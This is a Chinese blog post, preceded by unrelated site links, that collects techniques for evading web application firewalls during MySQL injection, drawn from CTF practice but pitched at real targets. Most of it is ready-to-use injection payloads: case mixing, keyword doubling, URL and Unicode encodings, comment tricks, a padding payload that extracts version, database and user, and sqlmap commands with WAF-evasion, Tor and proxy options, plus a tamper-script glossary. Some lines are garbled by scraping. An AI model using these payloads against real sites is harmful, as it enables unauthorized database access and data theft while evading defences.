- 1轻量,快速,稳定,可编排的组件式流程引擎 LiteFlow(你值得拥有)
- 2[linux-sd-webui]之img2img_sd img2img
- 3Flutter,起飞_flutter build apk完成时中执行函数
- 4(阿里云在线播放)基于SpringBoot+Vue前后端分离的在线教育平台项目_在线教育项目前后端分离
- 5STM32 之十 供电系统及内部参照电压(VREFINT)使用及改善ADC参考电压,内部参照电压的具体方法,只有在STM32F0x芯片的参考手册中才能找到,其他MCU的参考手册都是很简单的说明_stm32 软件如何使能vref引脚
- 6数据要素流通市场:挑战与机遇并存
- 7苹果电脑畅玩《魔兽世界巫妖王之怒国服》教程_crossover 魔兽世界
- 8远程访问VPN配置与验证实验:构建安全的远程连接_远程操作实验简介怎么写
- 9SpringBoot整合数据可视化大屏使用_springboot大屏
- 10由于篇幅限制,我无法为所有编程语言都提供一个完整的小程序游戏代码,但我可以为你提供几种流行编程语言(如Python、JavaScript、Java)的简单小游戏(如猜数字游戏)的代码示例。
mysql手工注入绕过_sql注入绕过WAF
赞
踩
这几天的CTF题中有好几道题都是sql注入的,但都存在WAF需要绕过,于是整理了一些常见的绕过WAF注入的方法。
在现实sql注入中我们也常常碰到WAF,那么掌握常见的绕过很有必要。
0x01、手工注入绕过
1、大小写混合例如:uNIoN sELecT 1,2,3,4
只适用于针对大小写关键字的匹配
2、替换关键字例如:UNIunionON SELselectECT 1,2,3,4
3、使用编码URL编码
如:空格变为%20、单引号%27、左括号%28、右括号%29,有时候两次编码绕过%252f%252a*/UNION%252f%252a /SELECT十六进制编码
可以对单个字符进行十六进制编码绕过,亦可以对整个字符串进行编码绕过。Unicode编码
单引号: %u0027、%u02b9、%u02bc、%u02c8、%u2032、%uff07、%c0%27、%c0%a7、%e0%80%a7
空格:%u0020、%uff00、%c0%20、%c0%a0、%e0%80%a0
左括号:%u0028、%uff08、%c0%28、%c0%a8、%e0%80%a8
右括号:%u0029、%uff09、%c0%29、%c0%a9、%e0%80%a9
4、使用注释
常见注释符号://, – , /**/, #, –+,– -, ;,–a普通注释
%55nION/**/%53ElecT 1,2,3,4内联注释 /!**/只有MySQL能识别
/!UNION / /!SELECT / 1,2,3
5、等价函数或命令hex()、bin() ==> ascii()
sleep() ==>benchmark()
concat_ws()==>group_concat()
mid()、substr() ==> substring()
@@user ==> user()
@@datadir ==> datadir()
and和or有时候不能使用,可以使用&&和||;还有=不能使用的情况,可以考虑尝试,因为如果不小于又不大于,那边是等于了
对于空格的绕过,可以使用如下符号绕过:%20 %09 %0a %0b %0c %0d %a0 /**/
6、特殊符号1、使用反引号`
例如select version(),可以用来过空格和正则,特殊情况下还可以将其做注释符用2、使用”-+.”
elect+id-1+1.from users; “+”是用于字符串连接的,”-”和”.”在此也用于连接,可以逃过空格和关键字过滤
select@^ 1.from users; @[email protected]_name,[email protected],@@表示系统变量
7、加括号例如:/?id=(1)union(select(1),mid(hash,1,32)from(users))
8、缓冲区溢出
不少WAF都是由C语言编写的,而C语言缓冲区保护机制。如何WAF在处理测试向量时超出其缓冲区长度,就会引发bug从而实现绕过例如:id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15–-+
其中0xAAAAAAAAAAAAAAAAAAAAA这里A越多越好,一般来说对应用软件构成缓冲区溢出都需要较大的测试长度,一般要求1000个以上
0x02、Sqlmap注入绕过
当我们使用sqlmap注入遇到WAF时,可以使用sqlmap中的tamper,它里面有很多实用的防过滤脚本
首先我们需要确定WAF过滤了那些关键字,比如:单引号、空格、select、union、admin等,当我们确定了过滤机制可以使用tamper进行绕过如何判断使用那个过滤脚本,最简单的办法就是直接在URL手工带入进行测试,根据返回信息进行判断
使用sqlmap确认是否含有WAFsqlmap -u "http://xxx?id=51&types=4" --thread 10 --identify-waf
使用参数进行绕过[email protected]:~# sqlmap -u "http://xxxx?id=51&types=4" --random-agent -v 2 #使用任意浏览器进行绕过,尤其是在WAF配置不当的时候
[email protected]:~# sqlmap -u "http://xxxx?id=51&types=4" --hpp -v 3#使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上
[email protected]:~# sqlmap -u "http://xxxx?id=51&types=4" --delay=3.5 --time-sec=60 #使用长的延时来避免触发WAF的机制,这方式比较耗时
[email protected]:~# sqlmap -u "http://xxxx?id=51&types=4" --proxy=211.211.211.211:8080 --proxy-cred=211:985#使用代理进行注入
[email protected]:~# sqlmap -u "http://xxxx?id=51&types=4" --ignore-proxy#禁止使用系统的代理,直接连接进行注入
[email protected]:~# sqlmap -u "http://xxxx?id=51&types=4" --flush-session#清空会话,重构注入
[email protected]:~# sqlmap -u "http://xxxx?id=51&types=4" --hex#或者使用参数 --no-cast ,进行字符码转换
[email protected]:~# sqlmap -u "http://xxxx?id=51&types=4" --mobile #对移动端的服务器进行注入
[email protected]:~# sqlmap -u "http://xxxx?id=51&types=4" --tor # 匿名注入
使用脚本绕过[email protected]:~# sqlmap -u "http://xxxx?id=51&types=4" --tamper=A.py,B.py#脚本A,脚本B
还可以同时使用多个脚本,使用-v参数观察payload的变化
常见脚本种类:apostrophemask.py
作用:用UTF8代替引号equaltolike.py
作用:like代替等号space2dash.py
作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)greatest.py
绕过过滤’>’ ,用GREATEST替换大于号space2hash.py
作用:空格替换为#号 随机字符串 以及换行符apostrophenullencode.py
绕过过滤双引号,替换字符和双引号。halfversionedmorekeywords.py
当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论space2morehash.py
空格替换为 #号 以及更多随机字符串 换行符appendnullbyte.py
作用:在有效负荷结束位置加载零字节字符编码ifnull2ifisnull.py
作用:绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’space2mssqlblank.py(mssql)
作用:空格替换为其它空符号base64encode.py
作用:用base64编码替换space2mssqlhash.py
作用:替换空格modsecurityversioned.py
作用:过滤空格,包含完整的查询版本注释space2mysqlblank.py
作用:空格替换其它空白符号(mysql)between.py
作用:用between替换大于号(>)space2mysqldash.py
作用:替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)
注:之前有个mssql的 这个是mysql的multiplespaces.py
作用:围绕SQL关键字添加多个空格space2plus.py
作用:用+替换空格bluecoat.py
作用:代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为likenonrecursivereplacement.py
作用:双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filtersspace2randomblank.py
作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集sp_password.py
作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾chardoubleencode.py
作用: 双url编码(不处理以编码的)unionalltounion.py
作用:替换UNION ALL SELECT UNION SELECTcharencode.py
作用:url编码randomcase.py
作用:随机大小写unmagicquotes.py
作用:宽字符绕过 GPC addslashesrandomcomments.py
作用:用/ /分割sql关键字charunicodeencode.py
作用:字符串 unicode 编码securesphere.py
作用:追加特制的字符串versionedmorekeywords.py
作用:注释绕过space2comment.py
作用:Replaces space character (‘ ‘) with comments ‘/ /‘halfversionedmorekeywords.py
作用:关键字前加注释
